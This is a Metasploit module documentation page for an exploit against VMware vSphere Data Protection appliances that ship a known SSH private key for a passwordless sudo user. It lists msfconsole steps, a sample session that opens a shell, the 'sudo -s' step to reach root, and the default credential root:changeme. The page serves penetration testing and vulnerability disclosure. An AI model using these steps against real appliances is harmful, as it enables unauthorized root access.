adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
d7966104f2bfab668e204c04b2eee4585c1200de
metasploit-gs/documentation/modules/exploit/linux/ssh/vmware_vdp_known_privkey.md
T

908 B
Raw Blame History

Vulnerable Application

VMware vSphere Data Protection appliances 5.5.x through 6.1.x contain a known ssh private key for the local user admin who is a sudoer without password.

Verification Steps

  1. Start msfconsole
  2. Do: use exploit/linux/ssh/vmware_vdp_known_privkey
  3. Do: set rhost 1.2.3.4
  4. Do: exploit
  5. You should get a shell.
  6. Type: sudo -s to become root user

Scenarios

This is a run against a known vulnerable vSphere Data Protection appliance.

msf > use exploit/linux/ssh/vmware_vdp_known_privkey  
msf exploit(vmware_vdp_known_privkey) > set rhost 1.2.3.4  
rhost => 1.2.3.4  
msf exploit(vmware_vdp_known_privkey) > run  
  
[+] Successful login  
[*] Found shell.  
[*] Command shell session 1 opened (1.2.3.5:34147 -> 1.2.3.4:22) at 2017-01-20 20:43:22 +0100

Further Information

The default account of the appliance is root:changeme

Reference in New Issue View Git Blame Copy Permalink